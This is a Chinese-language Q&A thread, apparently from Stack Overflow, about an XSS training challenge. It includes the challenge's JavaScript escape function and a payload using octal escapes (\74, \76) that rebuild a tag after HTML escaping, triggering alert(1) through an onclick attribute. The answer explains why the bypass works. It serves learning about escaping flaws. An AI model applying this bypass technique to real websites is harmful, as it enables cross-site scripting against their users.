0

此页面上,它建议下面的代码是可注入的。但是我不知道如何。在线回答说将其\74a onclick=alert(1)\76W放入标有“输入”的文本区域(名称下方)中,然后单击 W 是解决方案。

该页面确实说我赢了,但我认为这是错误的

在 jsfiddle 上运行它,发现它被正确地转义并且没有被注入。页面在说什么?真的有注入还是挑战页面错了?

HTML:

<div id="c">text</div>

JS:

//from challenge page
function escape(s) {
  function htmlEscape(s) {
    return s.replace(/./g, function(x) {
       return { '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;' }[x] || x;       
     });
  }

  function expandTemplate(template, args) {
    return template.replace(
        /{(\w+)}/g, 
        function(_, n) { 
           return htmlEscape(args[n]);
         });
  }

  return expandTemplate(
    "                                                \n\
      <h2>Hello, <span id=name></span>!</h2>         \n\
      <script>                                       \n\
         var v = document.getElementById('name');    \n\
         v.innerHTML = '<a href=#>{name}</a>';       \n\
      <\/script>                                     \n\
    ",
    { name : s }
  );
}

//the solution 
$('#c').html(escape('\74a onclick=alert(1)\76W'));
4

1 回答 1

1

\74您需要转义反斜杠,以便原样\76到达转义函数。否则他们转换为<太早>了。

$('#c').html(escape('\\74a onclick=alert(1)\\76W'));

演示:http: //jsfiddle.net/Lj7v4/1/

于 2013-10-05T07:16:43.170 回答